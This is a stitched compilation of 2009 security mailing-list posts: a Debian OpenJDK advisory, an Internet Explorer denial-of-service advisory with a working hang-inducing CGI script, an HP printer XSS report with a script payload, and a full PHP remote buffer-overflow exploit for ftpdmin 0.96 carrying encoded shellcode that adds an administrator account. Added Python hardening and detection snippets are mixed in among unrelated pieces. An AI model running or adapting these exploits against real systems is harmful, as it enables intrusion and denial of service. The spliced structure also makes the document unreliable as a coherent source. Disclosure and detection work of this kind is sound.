[SECURITY] [DSA 1769-1] New openjdk-6 packages fix arbitrary code execution
Debian Security Advisory DSA-1769-1                  secur...@debian.org
http://www.debian.org/security/                           Florian Weimer
April 11, 2009                       http://www.debian.org/security/faq

Package        : openjdk-6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2006-2426 CVE-2009-0581 CVE-2009-0723 CVE-2009-0733
                 CVE-2009-0793 CVE-2009-1093 CVE-2009-1094 CVE-2009-1095
                 CVE-2009-1096 CVE-2009-1097 CVE-2009-1098 CVE-2009-1101

Several vulnerabilities have been identified in OpenJDK, an implementation of the Java SE platform.

Creation of large, temporary fonts could use up available disk space, leading to a denial of service condition (CVE-2006-2426).

Several vulnerabilities existed in the embedded LittleCMS library, exploitable through crafted images: a memory leak, resulting in a denial of service condition (CVE-2009-0581), heap-based buffer overflows, potentially allowing arbitrary code execution (CVE-2009-0723, CVE-2009-0733), and a null-pointer dereference, leading to denial of service (CVE-2009-0793).

The LDAP server implementation (in com.sun.jdni.ldap) did not properly close sockets if an error was encountered, leading to a denial-of-service condition (CVE-2009-1093).

The LDAP client implementation (in com.sun.jdni.ldap) allowed malicious LDAP servers to execute arbitrary code on the client (CVE-2009-1094).

The HTTP server implementation (sun.net.httpserver) contained an unspecified denial of service vulnerability (CVE-2009-1101).

Several issues in Java Web Start have been addressed (CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098). The Debian packages currently do not support Java Web Start, so these issues are not directly exploitable, but the relevant code has been updated nevertheless.

For the stable distribution (lenny), these problems have been fixed in version 9.1+lenny2.

We recommend that you upgrade your openjdk-6 packages.
Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
--------------------------------
[BMSA 2009-04] Remote DoS in Internet Explorer
BLUE MOON SECURITY ADVISORY 2009-04
===================================

:Title: Remote Denial of Service in Internet Explorer
:Severity: Moderate
:Reporter: Blue Moon Consulting
:Products: Internet Explorer 7 and 8
:Fixed in: --

Description
-----------

We could not find out the definitive description for Internet Explorer
from Microsoft website. This is our own understanding of the
application: Internet Explorer is a web browser.

We have discovered a remote DoS vulnerability in Internet Explorer 7
and 8. When visiting a malicious page, the browser may freeze
indefinitely and killing it in Task Manager is required. With IE8's
default settings, killing the tab process simply launches another
process and goes to the same malicious page, hence repeating the cycle.

The root cause is unknown to us. We suspect that it is related to the
display of unprintable characters on Windows XP and Vista. The same
problem does not occur in Windows 7.

Microsoft has classified this vulnerability as a stability (not
security) issue and will be addressing it in the next version of the
application.

Workaround
----------

There is no workaround.

Fix
---

This problem is to be fixed in the next version of Internet Explorer.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0
<http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.

:Initial vendor contact:
    March 19, 2009: Initial contact sent to sec...@microsoft.com.

:Vendor response:
    March 19, 2009: Tony replied stating the preference for PGP
    communication.

:Further communication:
    March 20, 2009: Technical details and PoC code were sent to Tony, in
    PGP MIME format.

    March 20, 2009: Tony replied with a new case identifier MSRC 9011jr
    and informed us of a new case manager, Jack.

    March 21, 2009: We further reported that IE 8 was affected by the
    same bug, in PGP MIME format.

    March 30, 2009: We asked if Microsoft had received our PoC.

    March 31, 2009: Jack confirmed the receipt, and replied that
    Microsoft could not reproduce the behavior of this bug.

    April 01, 2009: We clarified that we tested with IE 7, and IE 8 on
    Vista Business. Sent in PGP MIME format.

    April 01, 2009: Jack said the email was stripped out and asked us to
    resend.

    April 02, 2009: We resent the last email in plain text.

    April 03, 2009: Jack told us Microsoft only experienced temporary
    DoS and in no case did Internet Explorer hang indefinitely.

    April 06, 2009: We sent Jack a video clip, in PGP MIME format.

    April 06, 2009: Jack asked us to resend because the email was
    stripped again.

    April 07, 2009: We resent the clip in plain text to Jack.

    April 09, 2009: Jack acknowledged the receipt and let us know the
    bug would be fixed in the next version of Internet Explorer.

    April 09, 2009: We asked for a confirmation of bug classification.

    April 09, 2009: Jack confirmed this bug was classified as stability,
    instead of a security issue. We therefore decided to release this
    advisory to the public.

:Public disclosure: April 11, 2009

:Exploit code:
    The following CGI script causes IE to hang indefinitely. ::

        #!C:/python25/python
        import sys
        import random

        CHAR_SET = [chr(x) for x in range(0x20)]
        CHAR_SET += [chr(x) for x in range(128, 256)]

        def send_file():
            l = 80 + 4096
            print "Content-Type: text/plain"
            print "Content-Length: %d" % l
            print "Cache-Control: no-cache, no-store, must-revalidate"
            # this is not standardized, but use it anyway
            print "Pragma: no-cache"
            print
            # bypass IE download dialog
            sys.stdout.write("a" * 4096)
            # print junks
            for i in xrange(l):
                sys.stdout.write(random.choice(CHAR_SET))
            sys.exit()

        send_file()

Disclaimer
----------

The information provided in this advisory is provided "as is" without
warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. Your use of the
information on the advisory or materials linked from the advisory is at
your own risk.

Blue Moon Consulting Co., Ltd reserves the right to change or update
this notice at any time.

Cheers

-- 
Nam Nguyen
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn
In Response to Bid 34130 Invalid
The observed behavior is explained at the link mentioned below:

http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html

This vulnerability persists in newer versions of Google Chrome too.
HP Deskjet 6800 XSS in Web Interface
A Cross-site scripting input validation error has been identified in the web interface of the HP Deskjet 6800 printer family. By sending a string such as <script>alert("found XSS on this page")</script> via a POST request to /refresh_rate.htm the resulting error page will execute the script. Verified on Deskjet 6840 firmware version: XF1M131A, but the firmware seems to be generic to the 6800 family, so possibly the entire family is vulnerable.

Vulnerability Timeline:

3/21/09: Vendor notification via email
3/21/09: Vendor upgrades ticket to next level of support
3/31/09: Vendor's Advanced Support Group replies: "the issue that you are experiencing is due to faulty firmware of the printer and as a result the printer needs to be serviced from a HP authorized service center."
3/31/09: I reply asking what firmware version fixes the issue and ask if this vulnerability has been reported previously
3/31/09: Vendor replies: "I regret to inform you that there is no specific firmware available for your printer. As the issue is related to the hardware of the printer, it is beyond the scope of our email support and needs the personal attention of a technician. I would suggest you to get the printer serviced at the nearest HP Authorised service centre. For your convenience I provided below information to locate the nearest HP Authorised service centre."
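The error page described above echoes the submitted value back into HTML without validation or encoding. The following added example (not HP's firmware code; the page layout and the `refresh_rate` field name are assumptions) shows the vulnerable rendering next to a hardened version that first validates the field as a positive integer and, for the error page, HTML-escapes whatever it echoes:

```python
# Added example, not code from the HP firmware or from the report's author.
# The page markup and the field name "refresh_rate" are assumptions.
import html
import re

# Payload quoted in the report, reconstructed here as sample input.
SAMPLE_PAYLOAD = '<script>alert("found XSS on this page")</script>'

_PAGE = "<html><body><h1>Error</h1><p>Invalid refresh rate: %s</p></body></html>"


def parse_refresh_rate(value):
    """Input validation: accept only a positive decimal integer, else None.

    A refresh rate never legitimately contains markup, so rejecting anything
    that is not digits removes the attack surface before rendering.
    """
    if not re.fullmatch(r"[0-9]+", value):
        return None
    n = int(value)
    return n if n > 0 else None


def render_error_vulnerable(refresh_rate):
    """Error page that echoes the submitted value verbatim (the reported bug)."""
    return _PAGE % refresh_rate


def render_error_hardened(refresh_rate):
    """Same page, but the untrusted value is HTML-escaped before insertion.

    html.escape(quote=True) converts < > & " ' to entities, so the browser
    displays the text instead of parsing it as a tag.
    """
    return _PAGE % html.escape(refresh_rate, quote=True)


def reflects_unescaped(page, value):
    """True if the raw submitted value survives into the rendered HTML."""
    return value in page
```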
ftpdmin v. 0.96 RNFR remote buffer overflow exploit
<?php
/*
ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
by Nine:Situations:Group::surfista

software site: http://www.sentex.net/~mwandel/ftpdmin/
our site: http://retrogod.altervista.org/

bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to the
second memory region. We have a very small set of chars that we can use, RNFR
(Rename From) command accept pathnames as argument, so characters whose integer
representations are in the range from zero through 31 and reserved chars are
not allowed!
*/
error_reporting(7);

$ftp_server = "192.168.0.1";
$ftp_user   = "anonymous";
$ftp_pass   = "a...@email.com";

function ftp_cmd($cmd){
    global $conn_id;
    echo "- ".$cmd."\n";
    $buff = ftp_raw($conn_id, $cmd);
}

#WinExec shellcode of mine, encoded with the alpha2 tool by SkyLined, adds
#a surfista admin user with pass pass
#contains hardcoded address, re-encode command:
#alpha2 esp shdmp.txt
$scode = "TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
"Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5".
"prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN".
"w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw".
"4gPqcpupr3VQybSrTE1kOA";

#do not touch, esp adjustment and subsequent call esp, very large but we have
#lots of unused space
$code = "TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI".
"NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA";

if (strlen($scode) > 272) {die("[!] shellcode too large!");}

$conn_id = ftp_connect($ftp_server) or die("(!) Unable to connect to $ftp_server");
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
    echo "(*) Connected as $ftp_u...@$ftp_server\n";
} else {
    die("(!) Unable to connect as $ftp_user\n");
}

$jnk    = str_repeat("\x66", 272 - strlen($scode));
$eip    = "\x44\x3a\x41\x7e"; //0x7E413A44 jmp esp, user32.dll xp sp3
$jnk_ii = str_repeat("\x66", 119 - strlen($code));
$bof    = $scode.$jnk.$eip.$code.$jnk_ii;

$boom = "RNFR ".str_repeat("x", 0x0096);
ftp_cmd($boom);
$boom = "RNFR ".$bof;
ftp_cmd($boom);
$boom = "RNFR ".str_repeat("x", 0x0208);
ftp_cmd($boom);

ftp_close($conn_id);
echo "(*) Done !\n";
?>

url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html
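The exploit post above relies on RNFR arguments far longer than any real pathname (150, 395 and 520 bytes), and on a purely alphanumeric payload, so byte-value filtering would not catch it. The following added detection example (not part of the original post) scans FTP command logs for over-long RNFR/RNTO arguments; the log format and the 260-byte threshold are assumptions, and the sample lines are constructed:

```python
# Added example, not code from the original exploit post.
# Assumed log format: "<timestamp> <client-ip> <COMMAND> <argument>".
import re

LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$")

# Assumed threshold: Windows MAX_PATH. A legitimate pathname argument to a
# Windows FTP daemon should never exceed it.
MAX_ARG_LEN = 260


def parse_ftp_log_line(line):
    """Split one assumed-format log line into its fields, or return None."""
    m = LOG_LINE.match(line.rstrip("\n"))
    if not m:
        return None
    return {"ts": m["ts"], "ip": m["ip"], "cmd": m["cmd"], "arg": m["arg"] or ""}


def find_suspicious_rnfr(lines, max_len=MAX_ARG_LEN):
    """Return (timestamp, ip, arg_len) for each RNFR/RNTO argument over max_len.

    The exploit's payload is alpha2-encoded (letters and digits only), so the
    argument length, not its byte values, is the reliable signal here.
    """
    hits = []
    for line in lines:
        rec = parse_ftp_log_line(line)
        if rec and rec["cmd"] in ("RNFR", "RNTO") and len(rec["arg"]) > max_len:
            hits.append((rec["ts"], rec["ip"], len(rec["arg"])))
    return hits


# Constructed sample: a normal rename, then the three RNFR lengths the exploit
# sends (0x96 = 150, 272 + 4 + 119 = 395, 0x208 = 520 bytes).
SAMPLE_LOG = [
    "2009-04-11T10:00:01 10.0.0.5 USER anonymous",
    "2009-04-11T10:00:02 10.0.0.5 RNFR old_report.txt",
    "2009-04-11T10:00:02 10.0.0.5 RNTO new_report.txt",
    "2009-04-11T10:01:00 10.0.0.9 RNFR " + "x" * 0x96,
    "2009-04-11T10:01:00 10.0.0.9 RNFR " + "A" * 395,
    "2009-04-11T10:01:01 10.0.0.9 RNFR " + "x" * 0x208,
]

if __name__ == "__main__":
    for ts, ip, n in find_suspicious_rnfr(SAMPLE_LOG):
        print("%s %s RNFR/RNTO argument of %d bytes exceeds %d" % (ts, ip, n, MAX_ARG_LEN))
```

Only the 395- and 520-byte arguments are reported; the 150-byte first probe stays under the threshold, so a rule like this should be paired with the server's own crash or disconnect events rather than used alone.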